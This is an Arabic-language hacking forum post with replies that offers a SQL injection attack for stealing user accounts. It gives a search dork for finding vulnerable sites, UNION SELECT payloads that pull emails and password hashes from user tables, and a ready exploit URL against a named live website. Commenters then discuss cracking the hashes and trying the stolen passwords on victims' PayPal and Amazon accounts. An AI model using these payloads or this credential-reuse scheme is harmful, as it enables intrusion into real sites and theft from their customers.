ثغرة اختراق المواقع وجلب الحسابات مثل ...amazon paypal

اليوم معنا ثغرة لجلب الحسابات فقط يجب ان تكون ذكي وتفك الهاش

الدوك

dork : inurl:“lire/index.php?rubid=”

الاستغلال

exploit : +UNION+SELECT+1,concat_ws(0x3a,email,mot_passe),3+ from+peel_utilisateurs–
: +UNION+SELECT+1,concat_ws(0x3a,email,mot_passe),3+ from+utilisateurs–

مثال

http://www.motorloisirs.com/lire/index.php?rubid=-3+UNION+SELECT+1,concat_ws(0x3a,email,mot_passe),3+from+peel_utilisateurs--

بالتوفيق للجميع الموضوع اهداء لحبيبي jago-dz ddd

أهلا يحج وشكرا على الثغرة

بس متئكد من وين أنا ها الإميلات لحسبات باي بال وليس للأعضاء المسجلين فى الموقع

:d

الطريقة يحج نعمل برنامج نحط فيه 30 هاش ويبحث فى الموقع وبكذا تخمن أكبر عدد

بكره باي بال بصرحة :slight_smile:

اخي تعمل تشاك وهو للايميلات ووجد حسابات Paypal و amazon في هذه الايميلات ثغرة جد رائعة لكن تعب شوية … ddd

لو على التخمين فى جميع موقع الشوب بتخمن بسورد العميل على حسابو فى الباي بال

لأن في ناس بتحط نفس البسوردات لكل أملكها هههههههههه

نعم هههههههههههههه 1+